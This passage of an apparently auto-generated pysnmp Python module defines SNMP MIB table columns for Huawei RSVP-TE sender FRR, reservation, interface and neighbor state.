hwRsvpTeSenderFrrFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 67), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("oneToOneDesired", 1), ("facilityDesired", 2), ("noBackupDesired", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrFlag.setStatus('current')
hwRsvpTeSenderFrrBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 68), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrBandwidth.setStatus('current')
hwRsvpTeSenderFrrExcludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 69), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrExcludeAny.setStatus('current')
hwRsvpTeSenderFrrIncludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 70), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrIncludeAny.setStatus('current')
hwRsvpTeSenderFrrIncludeAll = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 71), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrIncludeAll.setStatus('current')
hwRsvpTeSenderFrrInuseFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 72), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normal", 1), ("plrInUse", 2), ("mpInUse", 3), ("plrAndMpInUse", 4), ("underProtection", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrInuseFlag.setStatus('current')
hwRsvpTeSenderDiffServPsc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 73), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDiffServPsc.setStatus('current')
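# hwRsvpTeResvTable: RESV (reservation request) state per session, indexed by
# (hwRsvpTeSessionNumber, hwRsvpTeResvNumber): FlowSpec (TSpec/RSpec), RSVP
# hop, scope, style flags (shared/explicit) and policy data.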
hwRsvpTeResvTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3), )
if mibBuilder.loadTexts: hwRsvpTeResvTable.setStatus('current')
hwRsvpTeResvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvNumber"))
if mibBuilder.loadTexts: hwRsvpTeResvEntry.setStatus('current')
hwRsvpTeResvNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeResvNumber.setStatus('current')
hwRsvpTeResvType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvType.setStatus('current')
hwRsvpTeResvDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvDestAddr.setStatus('current')
hwRsvpTeResvSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvSenderAddr.setStatus('current')
hwRsvpTeResvDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvDestAddrLength.setStatus('current')
hwRsvpTeResvSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvSenderAddrLength.setStatus('current')
hwRsvpTeResvHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvHopAddr.setStatus('current')
hwRsvpTeResvHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvHopLih.setStatus('current')
hwRsvpTeResvInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvInterface.setStatus('current')
hwRsvpTeResvService = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 10), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvService.setStatus('current')
hwRsvpTeResvTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecRate.setStatus('current')
hwRsvpTeResvTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 12), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecPeakRate.setStatus('current')
hwRsvpTeResvTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 13), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecBurst.setStatus('current')
hwRsvpTeResvTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecMinTu.setStatus('current')
hwRsvpTeResvTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 15), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecMaxTu.setStatus('current')
hwRsvpTeResvRSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 16), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRSpecRate.setStatus('current')
hwRsvpTeResvRSpecSlack = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 17), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRSpecSlack.setStatus('current')
hwRsvpTeResvInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvInterval.setStatus('current')
hwRsvpTeResvScope = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvScope.setStatus('current')
hwRsvpTeResvShared = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 20), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvShared.setStatus('current')
hwRsvpTeResvExplicit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvExplicit.setStatus('current')
hwRsvpTeResvRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRsvpHop.setStatus('current')
hwRsvpTeResvPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 23), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvPolicy.setStatus('current')
hwRsvpTeResvTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 24), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTtl.setStatus('current')
hwRsvpTeResvConfirm = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 25), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvConfirm.setStatus('current')
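# hwRsvpTeResvFwdTable: reservation state being forwarded upstream; largely
# mirrors the columns of hwRsvpTeResvTable and adds message-id information.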
hwRsvpTeResvFwdTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4), )
if mibBuilder.loadTexts: hwRsvpTeResvFwdTable.setStatus('current')
hwRsvpTeResvFwdEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdNumber"))
if mibBuilder.loadTexts: hwRsvpTeResvFwdEntry.setStatus('current')
hwRsvpTeResvFwdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeResvFwdNumber.setStatus('current')
hwRsvpTeResvFwdType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdType.setStatus('current')
hwRsvpTeResvFwdDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdDestAddr.setStatus('current')
hwRsvpTeResvFwdSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdSenderAddr.setStatus('current')
hwRsvpTeResvFwdDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdDestAddrLength.setStatus('current')
hwRsvpTeResvFwdSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdSenderAddrLength.setStatus('current')
hwRsvpTeResvFwdHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdHopAddr.setStatus('current')
hwRsvpTeResvFwdHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdHopLih.setStatus('current')
hwRsvpTeResvFwdInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdInterface.setStatus('current')
hwRsvpTeResvFwdService = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 10), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdService.setStatus('current')
hwRsvpTeResvFwdTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecRate.setStatus('current')
hwRsvpTeResvFwdTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 12), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecPeakRate.setStatus('current')
hwRsvpTeResvFwdTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 13), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecBurst.setStatus('current')
hwRsvpTeResvFwdTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecMinTu.setStatus('current')
hwRsvpTeResvFwdTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 15), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecMaxTu.setStatus('current')
hwRsvpTeResvFwdRSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 16), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRSpecRate.setStatus('current')
hwRsvpTeResvFwdRSpecSlack = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 17), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRSpecSlack.setStatus('current')
hwRsvpTeResvFwdInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdInterval.setStatus('current')
hwRsvpTeResvFwdScope = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdScope.setStatus('current')
hwRsvpTeResvFwdShared = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 20), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdShared.setStatus('current')
hwRsvpTeResvFwdExplicit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdExplicit.setStatus('current')
hwRsvpTeResvFwdRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRsvpHop.setStatus('current')
hwRsvpTeResvFwdPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 23), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdPolicy.setStatus('current')
hwRsvpTeResvFwdTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 24), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTtl.setStatus('current')
hwRsvpTeResvFwdMsgIdFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 25), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdFlag.setStatus('current')
hwRsvpTeResvFwdMsgIdEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 26), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdEpoch.setStatus('current')
hwRsvpTeResvFwdMsgIdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 27), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdNumber.setStatus('current')
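# hwRsvpTeIfTable: per-interface RSVP-TE state, indexed by ifIndex: neighbor
# counts, refresh and retransmission timers, hello/srefresh switches and
# authentication settings.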
hwRsvpTeIfTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5), )
if mibBuilder.loadTexts: hwRsvpTeIfTable.setStatus('current')
hwRsvpTeIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: hwRsvpTeIfEntry.setStatus('current')
hwRsvpTeIfUdpNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfUdpNbrs.setStatus('current')
hwRsvpTeIfIpNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 2), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfIpNbrs.setStatus('current')
hwRsvpTeIfNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfNbrs.setStatus('current')
hwRsvpTeIfRefreshBlockadeMultiple = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshBlockadeMultiple.setStatus('current')
hwRsvpTeIfRefreshMultiple = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshMultiple.setStatus('current')
hwRsvpTeIfTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfTtl.setStatus('current')
hwRsvpTeIfRefreshInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 7), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshInterval.setStatus('current')
hwRsvpTeIfRouteDelay = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 8), TimeInterval()).setUnits('hundredths of a second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRouteDelay.setStatus('current')
hwRsvpTeIfEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfEnabled.setStatus('current')
hwRsvpTeIfUdpRequired = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 10), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfUdpRequired.setStatus('current')
hwRsvpTeIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 11), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hwRsvpTeIfStatus.setStatus('current')
hwRsvpTeIfHelloEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfHelloEnabled.setStatus('current')
hwRsvpTeIfSrefreshEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 13), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfSrefreshEnabled.setStatus('current')
hwRsvpTeIfSrefreshInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 14), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfSrefreshInterval.setStatus('current')
hwRsvpTeIfRetranIncDelta = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRetranIncDelta.setStatus('current')
hwRsvpTeIfRetranInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 16), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRetranInterval.setStatus('current')
hwRsvpTeIfAuthEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthEnabled.setStatus('current')
hwRsvpTeIfAuthEncrypted = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 18), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthEncrypted.setStatus('current')
hwRsvpTeIfAuthHandshake = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 19), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthHandshake.setStatus('current')
hwRsvpTeIfAuthLifeTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 20), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthLifeTime.setStatus('current')
hwRsvpTeIfAuthKey = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 21), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 392))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthKey.setStatus('current')
hwRsvpTeIfWindowSize = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 22), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfWindowSize.setStatus('current')
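# hwRsvpTeNbrTable: per-neighbor state, indexed by (ifIndex,
# hwRsvpTeNbrAddress): encapsulation (ip/udp/both), hello instances and loss
# counters, graceful-restart (GR) timers/status, refresh reduction and
# reliability capabilities.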
hwRsvpTeNbrTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6), )
if mibBuilder.loadTexts: hwRsvpTeNbrTable.setStatus('current')
hwRsvpTeNbrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAddress"))
if mibBuilder.loadTexts: hwRsvpTeNbrEntry.setStatus('current')
hwRsvpTeNbrAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16)))
if mibBuilder.loadTexts: hwRsvpTeNbrAddress.setStatus('current')
hwRsvpTeNbrProtocol = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ip", 1), ("udp", 2), ("both", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrProtocol.setStatus('current')
hwRsvpTeNbrStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hwRsvpTeNbrStatus.setStatus('current')
hwRsvpTeNbrSendersNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrSendersNumber.setStatus('current')
hwRsvpTeNbrReceiversNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReceiversNumber.setStatus('current')
hwRsvpTeNbrHelloEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloEnabled.setStatus('current')
hwRsvpTeNbrHelloSrcInstance = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloSrcInstance.setStatus('current')
hwRsvpTeNbrHelloDstInstance = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloDstInstance.setStatus('current')
hwRsvpTeNbrHelloLostCounter = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloLostCounter.setStatus('current')
hwRsvpTeNbrHelloType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("request", 1), ("ack", 2), ("none", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloType.setStatus('current')
hwRsvpTeNbrGrCapability = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrCapability.setStatus('current')
hwRsvpTeNbrGrRestartTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 12), TimeStamp()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrRestartTime.setStatus('current')
hwRsvpTeNbrGrRecoveryTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 13), TimeStamp()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrRecoveryTime.setStatus('current')
hwRsvpTeNbrGrStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normal", 1), ("supporting", 2), ("restarting", 3), ("restartTimerRunning", 4), ("recoveryTimerRunning", 5), ("grEnd", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrStatus.setStatus('current')
hwRsvpTeNbrAuthKeyId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 15), OctetString().subtype(subtypeSpec=ConstraintsUnion(ValueSizeConstraint(0, 0), ValueSizeConstraint(6, 6), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrAuthKeyId.setStatus('current')
hwRsvpTeNbrReductionEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReductionEnabled.setStatus('current')
hwRsvpTeNbrReliabilityEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReliabilityEnabled.setStatus('current')
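# hwRsvpTeMessageIdTable: message-id bookkeeping per neighbor, indexed by
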